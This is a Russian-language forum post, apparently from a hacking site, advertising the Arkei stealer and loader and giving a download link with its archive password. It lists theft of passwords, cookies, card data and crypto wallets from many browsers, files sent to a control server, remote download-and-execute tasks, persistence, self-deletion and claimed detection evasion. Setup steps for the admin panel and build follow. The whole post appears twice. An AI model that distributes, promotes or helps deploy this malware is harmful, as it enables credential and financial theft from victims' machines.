AKASHI
Arkei — многофункциональный стиллер и нерезидентский лоадер в одном флаконе, написанный на C++ без использования ATL, CLR.
Собирает пароли, куки, CC, данные автозаполнения форм, кошельки (Bitcoin, Ethereum), файлы с рабочего стола, данные о машине, установленное ПО.
Процесс работы:
При запуске Arkei копируется в системную директорию, сканирует ОС на наличие перечисленных ниже браузеров, собирает данные из оных.
Затем бот собирает файлы с рабочего стола перечисленных ниже форматов, делает скриншот рабочего стола, помещает все собранные данные в архив и отправляет на сервер вместе с общей сводкой о системе.
После получает от сервера задание (открыть url, загрузка & запуск EXE), выполняет его и самоуничтожается, удаляя все следы прибывания в системе.
Поддерживаемые браузеры:
Chromium (Passwords + Cookies + CC + Autofill)
Google Chrome (Passwords + Cookies + CC + Autofill)
Mozilla Firefox (Passwords)
Opera (Passwords + Cookies + CC + Autofill)
Kometa (Passwords + Cookies + CC + Autofill)
Amigo (Passwords + Cookies + CC + Autofill)
Torch (Passwords + Cookies + CC + Autofill)
Orbitum (Passwords + Cookies + CC + Autofill)
Comodo Dragon (Passwords + Cookies + CC + Autofill)
360 Browser (Passwords + Cookies + CC + Autofill)
Nichome (Passwords + Cookies + CC + Autofill)
Yandex Browser (Passwords + Cookies + CC + Autofill)
Maxthon 5 (Passwords + Cookies + CC + Autofill)
Sputnik (Passwords + Cookies + CC + Autofill)
Epic Privacy Browser (Passwords + Cookies + CC + Autofill)
Vivaldi (Passwords + Cookies + CC + Autofill)
Поддерживаемые утилиты:
FileZilla
Функционал лоадера:
Загрузка файла любого формата по ссылке
Запуск файла после загрузки
Скрытый запуск загруженного файла
Добавление в автозагрузку (реестр)
Добавление в автозагрузку (ярлык)
Стиллер холодных кошельков криптовалют:
Bitcoin
Ethereum
Граббер файлов:
Динамичная настройка граббера файлов из админ-панели, поддержка любых типов файлов
Дополнительно:
Удобный установщик админ-панели
Открытие ссылки в браузере после работы стиллера
Уничтожение всех рабочих файлов Arkei
Низкий вес билда (143kb)
Сбор данных об установленном ПО
Поддержка Windows 7 / 8 / 8.1 / 10 | x32 / x64 (дедики от win server 08)
Работа из под пользователя, не нужны права админа
Non-Detect Runtime
Админ панель :
Установка:
1. Загрузите содержимое папки web на ftp
2. Загрузите sqlite3.dll на какой-либо хостинг с прямой ссылкой к файлу (к примеру github)
3. Создайте MySQL базу
4. Перейдите по адресу вашей будущей админ-панели, вас перебросит на установщик
5. Введите данные от MySQL, адрес вашей панели, логин-пароль админ-аккаунта, название будущей папки для сохранения отчетов Arkei и прямую ссылку по HTTP (HTTPS не поддерживается) к sqlite3.dll
6.Откройте Arkei Stealer.exe введите адресс вашей панели и нажмите на create
Скачать :
https://mega.nz/#!F0okHQKQ!sfAkZR6Lm_7Xhletsk7FyUt_-IiJYaa9VNmjFDlAKWQ
ВТ
https://www.virustotal.com/ru/file/3e36a6199fdcc8bf5ec1dc641a7edd47cd6b85e342b86ee67da8b1fadb80dc4e/analysis/
Пароль :
XakFor.Net
Собирает пароли, куки, CC, данные автозаполнения форм, кошельки (Bitcoin, Ethereum), файлы с рабочего стола, данные о машине, установленное ПО.
Процесс работы:
При запуске Arkei копируется в системную директорию, сканирует ОС на наличие перечисленных ниже браузеров, собирает данные из оных.
Затем бот собирает файлы с рабочего стола перечисленных ниже форматов, делает скриншот рабочего стола, помещает все собранные данные в архив и отправляет на сервер вместе с общей сводкой о системе.
После получает от сервера задание (открыть url, загрузка & запуск EXE), выполняет его и самоуничтожается, удаляя все следы прибывания в системе.
Поддерживаемые браузеры:
Chromium (Passwords + Cookies + CC + Autofill)
Google Chrome (Passwords + Cookies + CC + Autofill)
Mozilla Firefox (Passwords)
Opera (Passwords + Cookies + CC + Autofill)
Kometa (Passwords + Cookies + CC + Autofill)
Amigo (Passwords + Cookies + CC + Autofill)
Torch (Passwords + Cookies + CC + Autofill)
Orbitum (Passwords + Cookies + CC + Autofill)
Comodo Dragon (Passwords + Cookies + CC + Autofill)
360 Browser (Passwords + Cookies + CC + Autofill)
Nichome (Passwords + Cookies + CC + Autofill)
Yandex Browser (Passwords + Cookies + CC + Autofill)
Maxthon 5 (Passwords + Cookies + CC + Autofill)
Sputnik (Passwords + Cookies + CC + Autofill)
Epic Privacy Browser (Passwords + Cookies + CC + Autofill)
Vivaldi (Passwords + Cookies + CC + Autofill)
Поддерживаемые утилиты:
FileZilla
Функционал лоадера:
Загрузка файла любого формата по ссылке
Запуск файла после загрузки
Скрытый запуск загруженного файла
Добавление в автозагрузку (реестр)
Добавление в автозагрузку (ярлык)
Стиллер холодных кошельков криптовалют:
Bitcoin
Ethereum
Граббер файлов:
Динамичная настройка граббера файлов из админ-панели, поддержка любых типов файлов
Дополнительно:
Удобный установщик админ-панели
Открытие ссылки в браузере после работы стиллера
Уничтожение всех рабочих файлов Arkei
Низкий вес билда (143kb)
Сбор данных об установленном ПО
Поддержка Windows 7 / 8 / 8.1 / 10 | x32 / x64 (дедики от win server 08)
Работа из под пользователя, не нужны права админа
Non-Detect Runtime
Админ панель :
Установка:
1. Загрузите содержимое папки web на ftp
2. Загрузите sqlite3.dll на какой-либо хостинг с прямой ссылкой к файлу (к примеру github)
3. Создайте MySQL базу
4. Перейдите по адресу вашей будущей админ-панели, вас перебросит на установщик
5. Введите данные от MySQL, адрес вашей панели, логин-пароль админ-аккаунта, название будущей папки для сохранения отчетов Arkei и прямую ссылку по HTTP (HTTPS не поддерживается) к sqlite3.dll
6.Откройте Arkei Stealer.exe введите адресс вашей панели и нажмите на create
Скачать :
https://mega.nz/#!F0okHQKQ!sfAkZR6Lm_7Xhletsk7FyUt_-IiJYaa9VNmjFDlAKWQ
ВТ
https://www.virustotal.com/ru/file/3e36a6199fdcc8bf5ec1dc641a7edd47cd6b85e342b86ee67da8b1fadb80dc4e/analysis/
Пароль :
XakFor.Net